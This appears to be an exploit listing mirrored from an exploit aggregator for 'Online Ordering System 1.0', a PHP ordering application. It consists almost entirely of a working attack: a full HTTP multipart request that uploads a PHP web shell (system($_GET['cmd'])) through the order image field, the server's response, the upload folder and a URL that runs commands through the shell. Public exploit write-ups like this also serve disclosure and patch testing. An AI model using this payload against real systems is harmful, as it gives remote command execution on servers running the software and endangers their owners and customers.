Exploit for Online Ordering System 1.0 Shell Upload

Name: Exploit for Online Ordering System 1.0 Shell Upload
Rating: 5 (313 reviews)
2021-03-04 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:161654
# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution  
# Date: 04/03/2021  
# Exploit Author: Suraj Bhosale  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html  
# Version: 1.0  
# Tested on Windows 10, XAMPP  
  
  
Request:  
========  
  
POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)  
Gecko/20100101 Firefox/85.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;  
boundary=---------------------------14955282031852449676680360880  
Content-Length: 972  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/onlineordering/GPST/store/index.php  
Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir  
Upgrade-Insecure-Requests: 1  
  
-----------------------------14955282031852449676680360880  
Content-Disposition: form-data; name="transnum"  
  
VAF-XAP  
-----------------------------14955282031852449676680360880  
Content-Disposition: form-data; name="select1"  
  
25  
-----------------------------14955282031852449676680360880  
Content-Disposition: form-data; name="pname"  
  
keychain  
-----------------------------14955282031852449676680360880  
Content-Disposition: form-data; name="select2"  
  
1  
-----------------------------14955282031852449676680360880  
Content-Disposition: form-data; name="txtDisplay"  
  
25  
-----------------------------14955282031852449676680360880  
Content-Disposition: form-data; name="note"  
  
test  
-----------------------------14955282031852449676680360880  
Content-Disposition: form-data; name="image"; filename="shell.php"  
Content-Type: application/octet-stream  
  
<?php echo "Shell";system($_GET['cmd']); ?>  
-----------------------------14955282031852449676680360880--  
  
Response:  
=========  
  
HTTP/1.1 200 OK  
Date: Thu, 04 Mar 2021 13:28:27 GMT  
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27  
X-Powered-By: PHP/7.3.27  
Content-Length: 55  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<meta http-equiv="refresh" content="1; url=index.php">  
  
# Uploaded Malicious File can be Found in :  
onlineordering\GPST\store\design  
  
# go to  
http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname  
which will execute hostname command.